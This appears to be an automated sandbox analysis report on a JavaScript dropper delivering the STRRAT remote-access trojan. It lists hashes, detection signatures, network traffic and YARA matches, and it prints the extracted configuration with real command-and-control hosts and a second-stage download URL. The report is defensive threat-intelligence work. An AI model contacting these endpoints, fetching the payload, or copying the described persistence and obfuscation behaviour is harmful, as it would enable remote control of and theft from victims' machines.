Windows Analysis Report
Request For Quotation.js

Overview

General Information

Sample name: Request For Quotation.js
Analysis ID: 1526387
MD5: 545558f7f19d53890a240c10a524b8c6
SHA1: 63bfcebbbba94b5dde80814e5e62daee4c176868
SHA256: 8f5a17017f6723e7f40f626f10b973c109463e431c77c5d8257150551d3d0137
Tags: js, user-abuse_ch

Detection

STRRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected STRRAT
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: 00000000.00000003.2061027252.00000237A8D65000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
Source: http://wshsoft.company/jv/jrex.zip Virustotal: Detection: 13%
Source: Request For Quotation.js Virustotal: Detection: 35%
Source: Request For Quotation.js ReversingLabs: Detection: 26%
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49961 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49999 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50022 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50023 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50025 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50026 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50039 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50046 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50049 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50051 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50055 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50057 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50061 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:50062 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50064 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:50065 version: TLS 1.2

Software Vulnerabilities

Source: Request For Quotation.js Return value : ['"adodb.stream"']
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 4x nop then cmp eax, dword ptr [ecx+04h] 2_2_0251CAD8
Source: Joe Sandbox View IP Address: 199.232.192.209
Source: Joe Sandbox View IP Address: 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.4
Source: Joe Sandbox View IP Address: 199.232.196.209
Source: Joe Sandbox View JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: repo1.maven.org
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000002.00000002.3326043474.0000000009BFA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000002.00000002.3326043474.0000000009BFA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009BFA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009C04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009C04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009C0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000002.00000002.3335657129.00000000150EC000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009D14000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.3131427763.000000001510D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000002.00000002.3326043474.0000000009BFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B69000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B99000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: wscript.exe, 00000000.00000003.2068025380.00000237A9DA1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2054354727.00000237A8D34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zip
Source: wscript.exe, 00000000.00000003.2055395004.00000237A8E63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zipleB
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 00000002.00000002.3326043474.0000000009F97000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009D14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000002.00000002.3324030107.00000000049BF000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004891000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.000000000471C000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004606000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: javaw.exe, 00000002.00000002.3324030107.0000000004606000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009D14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000002.00000002.3324030107.000000000499A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000049BF000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004824000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000046AB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004849000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.000000000478A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004606000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004765000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.000000000486A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3324030107.0000000004900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org
Source: javaw.exe, 00000002.00000002.3324030107.0000000004900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 00000002.00000002.3324030107.0000000004900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jarplatform-5.5.0.jar
Source: javaw.exe, 00000002.00000002.3324030107.0000000004765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000002.00000002.3326043474.0000000009DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443

System Summary

barindex
Source: 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR Matched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_151DA58A 2_3_151DA58A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 2_3_151D6BB8 2_3_151D6BB8
Source: Request For Quotation.js Initial sample: Strings found which are bigger than 50
Source: 00000002.00000002.3326043474.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: 00000002.00000002.3326043474.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: Process Memory Space: javaw.exe PID: 7100, type: MEMORYSTR Matched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
Source: classification engine Classification label: mal100.troj.evad.winJS@6/4@8/4
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\otyhtiklwj.txt
